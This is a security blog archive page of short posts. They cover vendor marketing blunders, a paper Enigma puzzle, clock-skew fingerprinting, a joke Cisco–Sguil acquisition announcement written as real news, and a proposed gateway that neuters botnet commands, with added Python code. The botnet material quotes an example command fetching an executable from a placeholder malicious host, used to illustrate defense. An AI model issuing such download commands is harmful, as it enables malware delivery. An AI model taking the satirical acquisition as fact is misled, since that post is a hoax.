Showing posts with label WTF?. Show all posts

Wednesday, June 11, 2008

Unintentional hilarity

I subscribe to the Info Security News RSS feed, which is a pretty nice way to keep up with various goings on in the industry.

This morning, the top headline was:

Unencrypted AT&T laptop stolen, details of managers pay lost


I have to admit, I don't really feel too bad about the poor AT&T managers. However, the really funny part was the very next headline:

AT&T Launches Encryption Services to Help Businesses Secure E-Mail and Data


I can't make this stuff up, folks!

Monday, March 31, 2008

Switching to Sguil: A whole new meaning

Many of you may have wondered why I haven't yet blogged about the recent release of Sguil 0.7.0. Did I forget? No. Am I disappointed with it? Not at all! Am I just lazy? Yes, but that's not why.

The truth is, I've held off blogging about that because there's some even bigger news with the Sguil project!

You probably didn't know this, as we've tried hard to keep it under wraps until it could be formally announced, but the Sguil project has just received an extremely large vote of confidence, in the form of it being acquired lock, stock and barrel by Cisco!

Yes, you read that right! From the press release:

Under terms of the transaction, Cisco has acquired the Sguil™ project and related trademarks, as well as the copyrights held by the five principal members of the Sguil™ team, including project founder Robert "Bamm" Visscher. Cisco will assume control of the open source Sguil™ project including the Sguil.net domain, web site and web site content and the Sguil™ Sourceforge project page. In addition, the Sguil™ team will remain dedicated to the project as Cisco employees, continuing their management of the project on a day-to-day basis.

Really, I didn't blog about Sguil 0.7.0 yet because I didn't want to say anything that could have interfered with this deal.

The great thing about this is that both Cisco and Sguil have made significant investments in Tcl, as it's already found in the OS on many Cisco products. Of course, Sguil is written almost entirely in Tcl, so this should provide for some great synergy going forward. You should start seeing Sguil being pushed out into the carrier-grade Cisco gear by 3Q08, with the rest of the Cisco-branded products following in phases through 4Q09. Linksys-branded gear will be supported too, though there's not an official timetable for that yet.

On a personal note, I would like to congratulate Bamm (AKA "qru"), Sguil's lead developer. He's put a lot of time into this project over the years, and is finally going to reap some rewards:

Although the financial details of the agreement have not been announced, Sguil™ developer Robert Visscher will become the new VP of Cisco Rapid Analysis Products for Security. “This deal means a lot to the Sguil™ project and to me personally,” Visscher explains. “Previously, we had to be content with simply being the best technical solution to enable intrusion analysts to collect and analyze large amounts of data in an extraordinarily efficient manner. But now, we’ll have the additional advantage of the world’s largest manufacturer of networking gear shoving it down their customers’ throats! We will no longer have to concern ourselves with mere technical excellence. Instead, I can worry more about which tropical island to visit next, and which flavor daiquiri to order. You know, the important things.”

I know that many of you will have questions about this major evolution in the Sguil project and our continuing roles as Cisco employees, so please feel free to leave them here as comments, or ask in freenode IRC's #snort-gui channel.

Wednesday, February 27, 2008

The awesomest

This is the awesomest thing I've ever heard on the Internet. Some guy recorded a 10 minute phone call with a phisher. My favorites are the wife, the FBI and the 357.

This is SFW, though there are two or three things bleeped out.

Go ahead, get pwn3d, you've got Norton.

So I open my inbox today and find an e-newsletter from Symantec. Normally, they barely register with me, and I just delete them and move on. This one though, had a great subject line:

Go ahead, You've got Norton


Really? That's the idea you're going with? It's safe to open that attachment/click on that link/view that malicious site, just because you've got Norton AV?

I know this was probably written by a marketdroid, as I sincerely doubt that the Norton AV product engineers would encourage you to engage in risky Internet behavior no matter which AV product you've got installed. Still, you'd think that someone, somewhere, when planning their marketing strategy, would notice the fundamental disconnect between that slogan and any actual good security practice.


As Richard Bejtlich is fond of saying, prevention eventually fails. C'mon, Symantec. How can you expect customers to trust your product if your own marketing efforts display an ignorance of fundamental security principles?

Saturday, November 10, 2007

File under: Things You Wish You Didn't Know

After reading this, I may never be able to attend a certain security convention ever again.

Tuesday, September 11, 2007

Would you notice this?

Just a quick thought I had. If your organization is using virtualization to pack many VMs onto your existing server platforms (as many sites are trying to do these days), would you necessarily notice if an additional VM popped up?

It turns out that VMs can be very small (the smallest VMWare image I found with a quick google search was 10MB, which could fit in my /tmp partition). Many, perhaps all, of the VM packages provide command-line level access to manage the running guest systems. VMWare even provides a Perl API for this.

If I were an attacker who managed to get access to your VM system, could I insert my own VM image and make it run? If so, I could potentially have my own custom hacking environment, with root privileges and whatever software I needed, without creating too many files or new processes on the host OS. Unless you're looking carefully at every file on the system, or watching what VMs are running, would you notice?

Would anyone with real-world virtual server experience care to share their thoughts?

Thursday, April 12, 2007

Cool network visualization

I highly recommend that you take a look at this. You just need to see it to believe it. I find their "network activity as videogame" metaphor oddly appealing. It's almost like it's translating your network activity into the story of an epic space battle. Since humans are conditioned by long experience to assimilate and relate well to stories, this could be quite an effective approach. Joseph Campbell as NSM analyst.

I'd really like to be able to run this against my own network to see how effective it would be in every day use. It's a bit hard to tell based on the clip they've put out.

Thursday, March 22, 2007

Fun Crypto Toy

I took some time off earlier this month to have a family vacation in London. Overall, it was pretty fun, but we wanted to get out of the city for a bit, so we took the train to Bletchley Park. BP is where the British government ran their super-secret cryptography operations against the German ciphers during WWII.

Of course, the most famous of these ciphers is the Enigma machine, of which there were actually several different types in use in the various branches of the German military. I don't want to bore you with all the details of Enigma, especially since they're probably familiar to many of you. What I wanted to tell you about was this fun toy I bought, the Pocket Enigma cipher machine.

Housed in CD jewel case and made entirely of paper, it emulates a simple one-rotor system (with a choice of two possible rotors). There's no plugboard or anything complex like that, so it's really easy to understand, and it's a lot of fun to send seekrit messages to your buddies, in a flashlight-under-the-covers kind of way.

Here's my contribution to the fun. See if you can decode the following message, enciphered on my very own Pocket Enigma. The first person to post a correct solution in the comments wins... umm... the people's ovation and fame forever!


II B
X VJFEI OJAXQ PBUXQ DTFVH GFAKQ UQGES IOGZW
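To show what "a simple one-rotor system" with reciprocal wiring actually does, here is an added Python model that is not part of the original post and is not the Pocket Enigma's real wiring: the two rotor tables are constructed for illustration, and the stepping convention (rotor advances once before each letter) is an assumption, so this code cannot decode the message above. What it does show is the property that makes such a toy usable with a single disc: the same operation both enciphers and deciphers, and no letter ever enciphers to itself.

```python
import string

ALPHABET = string.ascii_uppercase

# Constructed rotor wirings: 13 reciprocal letter pairs each (every letter
# appears exactly once). These are illustrative only and are NOT the wiring of
# the real Pocket Enigma discs, so this code cannot decode the post's message.
ROTORS = {
    "I":  ["AJ", "BX", "CQ", "DW", "EM", "FO", "GT", "HV", "IR", "KZ", "LN", "PY", "SU"],
    "II": ["AK", "BU", "CE", "DZ", "FJ", "GP", "HQ", "IL", "MW", "NV", "OY", "RS", "TX"],
}


def build_wiring(pairs):
    """Turn 13 letter pairs into an involution (a maps to b and b to a) over A-Z."""
    wiring = {}
    for a, b in pairs:
        wiring[a] = b
        wiring[b] = a
    if sorted(wiring) != list(ALPHABET):
        raise ValueError("rotor must pair every letter exactly once")
    return wiring


def cipher(text, rotor="II", start="B"):
    """Encipher or decipher (same operation) with one stepping reciprocal rotor.

    Assumed stepping convention: the rotor advances one position before each
    letter. A letter p at rotor offset k is mapped to w(p + k) - k, so applying
    the function twice with the same key returns the plaintext.
    """
    wiring = build_wiring(ROTORS[rotor])
    offset = ALPHABET.index(start)
    out = []
    for ch in text.upper():
        if ch not in ALPHABET:
            continue                      # a paper machine has no spaces or punctuation
        offset = (offset + 1) % 26        # step the rotor
        entry = ALPHABET[(ALPHABET.index(ch) + offset) % 26]
        exit_ = wiring[entry]             # reciprocal pairing on the disc
        out.append(ALPHABET[(ALPHABET.index(exit_) - offset) % 26])
    return "".join(out)


def groups_of_five(text):
    """Format ciphertext in the five-letter groups used in the post."""
    return " ".join(text[i:i + 5] for i in range(0, len(text), 5))


if __name__ == "__main__":
    msg = "ATTACK AT DAWN"
    ct = cipher(msg, "II", "B")
    print(groups_of_five(ct))
    print(cipher(ct, "II", "B"))          # round-trips to ATTACKATDAWN
```

Because the wiring is an involution with no fixed points, w(p + k) can never equal p + k, which is exactly the "a letter never encrypts to itself" property that helped the Bletchley Park cryptanalysts attack the real machines.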

Friday, August 25, 2006

The Pwnion

Inspired in part by my earlier posting about The Hidden Dangers of Protocols, some of us on #snort-gui were playing with the idea of The Onion applied to security. Here are some of the headlines we came up with.

<Hanashi> "Area Man's Password Hacked After He Exchanges it for Chocolate Bar"
<Hanashi> "Commentary: I Totally Pwn!"
<Nigel_VRT> "Wireless: No Wires! What's up with that?"
<Nigel_VRT> "Undisclosed remote bug in software that some people use"
<Hanashi> "Study: Second graders way too amused by phrase 'IP'"
<helevius> "Jumbo Frames: Obese, or Just Big Boned?"
<Hanashi> "Covert Channel Discovered in IPv6: The Use of IPv6"
<Nigel_VRT> "If you don't use Microsoft Windows, you're an evil hacker. By Staff writer Will G. Ates"


What about you? Post your best funny headlines in the comments!

Wednesday, August 16, 2006

Dumbest. Seminar. Ever.

I got the following today, from a very reputable security vendor. I'm not going to name them, because I think they're otherwise pretty good, but this is really just pathetic:

The Hidden Dangers of Protocols

Protocols are the sets of rules governing the communications of network applications, such as instant messaging, peer-to-peer file sharing, and streaming media. But, protocols may allow these communications to transmit confidential information, spyware, keyloggers, worms, viruses, and other security threats into and out of your organization. Protocols may also allow users to access inappropriate applications. Plus, they may be consuming valuable network bandwidth and draining user productivity in the process!

Protocols are dangerous? I've got news for this writer: protocols put the "work" in "network". Without TCP/IP, odds are you don't have a network, and that's not counting the myriad other protocols above and below the IP level.

Clearly, the vendor (as a whole) understands the concept of protocols perfectly well. So I conclude that either they've hired an incompetent writer or editor in the marketing department, or they're taking the chance to do a little FUD-mongering. I'll be charitable and guess it's the former.

Seriously, this is the dumbest thing I've seen from a security company in quite a long time.

Thursday, August 03, 2006

Crazy Botnet Idea

I read with interest Gadi Evron's recent post, mitigating botnet C&Cs has become useless (while you're at it, read Richard Bejtlich's response, too). Gadi Evron has probably forgotten, relearned and forgotten again more things about botnets than I will ever know, so when he speaks on the subject, I pay attention.

As with most security problems, the basic issue here is that competition drives innovation. Like biological evolution, the digital evolutionary imperative mandates that as we improve our defensive techniques, the Bad Guys also improve their offense. With the transition from amateur malware writers to professional bad actors, the pace of this evolution has already increased dramatically and will continue to do so.

So what can we do? First, let me make the following assertion:

Botnets are harmful both to local networks and users, and to the Internet community as a whole.

I don't think anyone would disagree with that statement. Let's follow it up with another:

Doing nothing to protect ourselves is not an option.

Now, if we accept Gadi's premise that cutting off C&C channels is harmful in the long run, where does that leave us?

The root of that premise is that long-term harm occurs because our current methods have too high an impact on botnets. By shutting off the C&C servers, we take a discernible action, forcing the botnet owners to respond or lose access to their net.

Let's think about this for a second. If we've so far fought the problem by shutting down C&C servers, it stands to reason that most of the botnet countermeasures have also evolved to deal specifically with that sort of threat. If we're able to change our response, we may gain (temporary) advantage.

So here's my crazy idea. The HoneyNet Project already has tools that dynamically modify network traffic in order to prevent outgoing attacks from their honeypots from affecting other Internet hosts. Let's repurpose this technology to act in reverse; let's use it to protect our hosts from fully participating in identified botnet C&C channels.

How would this work? I haven't worked all the details out, but I'm thinking of something like the following:

  1. The attacker sends a command to a host through the C&C channel (e.g., .download http://my.bad.host/file.exe)
  2. An anti-botnet gateway at the user's site intercepts this, and transparently modifies the packet to say something slightly different (e.g., .d0wnl04d http://my.bad.host/file.exe)
  3. The botnet node on the compromised PC doesn't recognize this as a command, so takes no action
  4. The attacker never realizes that he's lost control of the botnet node, because it's still participating in the C&C communication channel. Even though he's not getting any responses to some of his dangerous commands, perhaps less dangerous commands are working well, disguising the fact that we're interfering with his attacks.
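Here is an added Python sketch of steps 1 through 4 (not part of the original post, and not code from the HoneyNet Project). It assumes an IRC-style C&C channel, that the gateway already sees reassembled lines, and that someone maintains the channel list and the verb table; the channel name and the ".update" verb are constructed. The one design point it enforces is that every replacement has the same length as the command it replaces, as ".d0wnl04d" does for ".download", so a gateway rewriting packets in flight does not disturb TCP sequence numbers.

```python
import re

# Constructed: IRC channels already identified as C&C channels, and the command
# verbs we want the bot to stop understanding. Each replacement must have the
# SAME LENGTH as the original so a transparently rewritten packet keeps its
# TCP sequence numbers valid.
KNOWN_CC_CHANNELS = {"#bots-example"}
NEUTER = {
    ".download": ".d0wnl04d",   # the post's own example
    ".update":   ".upd4te",     # constructed additional verb
}

# Minimal IRC PRIVMSG shape: optional ":prefix", target, then ":" and the text.
PRIVMSG = re.compile(r"^(:\S+ )?PRIVMSG (?P<target>\S+) :(?P<body>.*)$")


def rewrite_line(line):
    """Return (possibly rewritten line, whether it was changed)."""
    m = PRIVMSG.match(line)
    if not m or m.group("target") not in KNOWN_CC_CHANNELS:
        return line, False                     # not C&C traffic: pass through untouched
    verb, sep, rest = m.group("body").partition(" ")
    replacement = NEUTER.get(verb.lower())
    if replacement is None:
        return line, False                     # harmless command: leave it working (step 4)
    if len(replacement) != len(verb):
        raise ValueError("replacement must preserve length")
    return line[:m.start("body")] + replacement + sep + rest, True


def filter_stream(lines):
    """Apply rewrite_line to every line; returns (lines, number rewritten)."""
    out, changed = [], 0
    for line in lines:
        new_line, was_changed = rewrite_line(line)
        out.append(new_line)
        changed += was_changed
    return out, changed


# Constructed sample of reassembled IRC lines as seen by the gateway.
SAMPLE = [
    ":boss!op@bad.example PRIVMSG #bots-example :.download http://my.bad.host/file.exe",
    ":boss!op@bad.example PRIVMSG #bots-example :.ping",
    ":boss!op@bad.example PRIVMSG #bots-example :.UPDATE http://my.bad.host/v2.exe",
    ":alice!a@chat.example PRIVMSG #linux :.download is not a command in here",
]

if __name__ == "__main__":
    rewritten, n = filter_stream(SAMPLE)
    for line in rewritten:
        print(line)
    print(f"{n} command(s) neutered")
```

Only the two dangerous verbs addressed to the known channel are touched; the ".ping" keeps working, which is what keeps the attacker from noticing, and the unrelated ".download" on a normal channel is left alone because matching on the verb alone would be far too noisy.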

You're probably saying to yourself, "Hey, this requires a lot of work to maintain." If so, you'd be right. We'd have to track the botnet C&C channels, analyze their command structures and somehow get updates out to the protected sites. I think of this as sort of an extension to current spyware/malware discovery processes, and we'd probably need some serious commercial support if this idea were to ever be implemented.

The point is, we've tried attacking the problem both from the C&C side (shutting down servers) and from the client side (patch management & user education). Now let's try something that more fully leverages our control over our own network infrastructure, too.

I told you it was a crazy idea.

Monday, November 28, 2005

On the dangers of speaking outside your area of competence

Ok, this is just dumb. According to this article, Richard Carrigan, a physicist at Fermilab, is concerned that aliens (as in E.T.) are going to "infect the Internet". He claims that the signals processed by the millions of computers participating in the SETI@Home distributed computing project are capable of carrying malicious code, and the SETI project should implement some sort of signal quarantine to protect us. Kind of like a reverse Jeff Goldblum maneuver from Independence Day.

The thing is, this isn't a very likely scenario. First, the signals are data, and not executable code. That's our first layer of protection.

Now, we could posit a software flaw in the SETI@Home client that could lead to some sort of overflow that allowed arbitrary code to be executed, but in order for aliens to successfully exploit it, they'd need to know an awful lot about how our computers work, and about our current software versions, and the laws of physics are working against them.

The closest star is about 4.5 light years away from Earth. Assuming that we broadcast complete technical details of the x86 architecture and an entire copy of the Windows OS, along with a comprehensive set of security bulletins and an SDK, the necessary roundtrip time for data travelling at the speed of light would mean that by the time the "exploit" could arrive here, we'd be about 9 years further on. Let's see, 9 years ago, we'd all have been running NT 4 and Windows 95. Good luck trying a Win95 overflow on my XP system! The offsets are wrong now, and new security technologies exist now that weren't dreamed of then (like the non-executable stack). What will we have 9 years from now? I don't know (and neither do the aliens), but I do know the aliens don't stand a chance.

Seriously, I think he's missing the point. If you want to be concerned with the security of the SETI@Home software or their new replacement, BOINC, don't bring aliens into the picture. Security concerns are legitimate, yes, but it is far more likely that if a software bug does exist that allows remote code execution, it'll be exploited by a human, not an alien.

Unless, of course, you believe this guy.

Update 2005-11-28 09:48 -- Check out Richard Carrigan's website for more information on his idea. There's a presentation and a copy of his paper on the subject.

Monday, September 19, 2005

2005 Underhanded C contest winners announced

Ahoy, me harties! The underhanded C contest (or, to we pirates, "the underhanded sea contest". Arr!) trains a perspective glass squarely on fine, upstanding looking code with a scurrilous hidden purpose. The winners have just been announced. Check 'em out, or ye'll be forced to drink a bucket 'o bilge!

Wednesday, August 03, 2005

Defcon's Wall of Sheep

This is hilarious. People, if you go to a hacker conference, make sure you practice safe computing. I would have thought this was just common sense.

Monday, April 18, 2005

Schneier on "Hacking the Papal Election"

This is how you think about everything in your life if you're in the security field. Check out Bruce Schneier's analysis on Hacking the Papal Election.

Friday, March 04, 2005

Remotely identifying computers via clock skew

ZDNet Australia is reporting that a University of California doctoral student has developed a technique for telling different computers apart over the network by detecting their clock skew. According to this article, the technique works behind NAT devices and over long periods of time, even if devices move around a lot.

I need to read the research paper in order to decide whether I believe this or not, but it sounds plausible. Unfortunately, the paper is not yet available.

UPDATE [2005-03-04 12:42]: The paper is indeed available, and can be found here.
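For a feel of how a clock-skew fingerprint is taken, here is an added Python example that is not from the original post or the paper. It assumes the generally known approach: record the remote host's timestamp (for instance the TCP timestamp option, which survives NAT) against our own receive time, and fit the drift of the difference over time; the slope is the remote clock's skew in parts per million. The fit here is plain least squares, a simplification of the paper's own method, and the two hosts, their skews and the delay jitter pattern are all constructed.

```python
def estimate_skew_ppm(observations, tick_hz):
    """Least-squares slope of (remote clock - local clock) against local time.

    observations: list of (local_receive_time_seconds, remote_timestamp_ticks),
    e.g. TCP timestamp option values seen in packets from one source. The slope
    is the remote clock's skew relative to ours, returned in parts per million.
    """
    t0, v0 = observations[0]
    xs = [t - t0 for t, _ in observations]
    ys = [(v - v0) / tick_hz - x for (_, v), x in zip(observations, xs)]
    n = len(xs)
    mean_x, mean_y = sum(xs) / n, sum(ys) / n
    sxx = sum((x - mean_x) ** 2 for x in xs)
    sxy = sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, ys))
    return sxy / sxx * 1e6


def same_host(skew_a_ppm, skew_b_ppm, tolerance_ppm=2.0):
    """Crude identity test: two fingerprints match if their skews agree."""
    return abs(skew_a_ppm - skew_b_ppm) <= tolerance_ppm


def simulate_host(skew_ppm, tick_hz=100.0, seconds=3600, interval=30, jitter_seed=0):
    """Constructed observations from a host whose clock runs skew_ppm fast/slow.

    Timestamps are quantized to tick_hz and arrive through a deterministic
    20-30 ms network delay pattern (no randomness, so results are repeatable).
    """
    obs = []
    phase = 123456.7                                 # constructed remote clock offset
    for i in range(seconds // interval + 1):
        t_send = i * interval
        remote_clock = t_send * (1 + skew_ppm * 1e-6) + phase
        tsval = int(remote_clock * tick_hz)          # remote clock as integer ticks
        delay = 0.020 + 0.001 * ((i * 37 + jitter_seed) % 11)
        obs.append((t_send + delay, tsval))
    return obs


if __name__ == "__main__":
    a = estimate_skew_ppm(simulate_host(120.0), 100.0)
    a2 = estimate_skew_ppm(simulate_host(120.0, jitter_seed=5), 100.0)
    b = estimate_skew_ppm(simulate_host(-40.0), 100.0)
    print(f"host A: {a:.2f} ppm, host A again: {a2:.2f} ppm, host B: {b:.2f} ppm")
    print("A == A again:", same_host(a, a2), " A == B:", same_host(a, b))
```

Over an hour of samples the delay jitter and the 10 ms timestamp quantization average out and the two hosts separate cleanly, while a second measurement of the same host lands within a couple of ppm of the first. The caveats a practitioner would want: the tolerance has to be set from how spread real skews are across a population, a host that runs NTP tightly may show a skew near zero like many others, and a remote stack that does not send timestamps gives you nothing to fit.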

Monday, November 01, 2004

Oxford Suspends Two Over "Hacking"

I've commented on this story before, but SecurityFocus.com is reporting that Oxford University has suspended two students for "hacking" their network, then publishing the results in the school paper. The students claim they did it to point out the school's lousy security, but that's a weak excuse at best. They violated the policy without permission, and got busted. Score one for the Oxford IT department.

Tuesday, September 21, 2004

WarGames

Yeah, ok, this isn't my usual fare on this blog, but I just finished watching my newly-acquired WarGames DVD. I'm astounded at how well this movie holds up two decades after its original release. Soviet era FUD aside, you could almost shoot the same script today. The computers would be smaller (no 8" IMSAI floppy drives) but hacking really hasn't evolved as much as you might think. We still use war dialers to find rogue modem lines, and people still use weak, guessable passwords for important accounts.

Ok, I'm off the soapbox now. I love this movie...

Wednesday, August 25, 2004

e-Jihad? "e-Yeah, right."

Well known Russian anti-virus vendor Kaspersky Labs is feeding the FUD machine. Its head, Yevgeny Kaspersky, is quoted in this article about the coming cyber-jihad. Apparently, tomorrow (Thursday, August 26) there will be a "large scale virus attack" that "might be delivered by Islamic terrorists".

I don't know about you, but I go through every day thinking, "There might be a large-scale virus attack today." And a lot of the time, I'm right. Either I've somehow got a psychic connection with Islamic terrorists, or this isn't news because it happens all the time. You choose. Kaspersky, you are better than this.

Update 08/26/04: Although this story was widely reported, Kaspersky Labs says it was just a misunderstanding of what Mr. Kaspersky was actually saying. See this story for more details.

Thursday, August 19, 2004

Will a firewall at the South Pole melt through?

Ok, this is a little weird. Apparently, a National Science Foundation research station at the South Pole was hacked earlier this year. Although the NSF disputes the claim, US Attorney General John Ashcroft and the FBI have at various times claimed that the attack placed the lives of the scientists there at risk, because the life support system was compromised. That may or may not be true, but it's certainly a convenient excuse for them to tout the USA PATRIOT Act and how they say it saved 58 lives.

I have no way to verify the claims on either side, but if you're interested in more information, SecurityFocus.com has the scoop.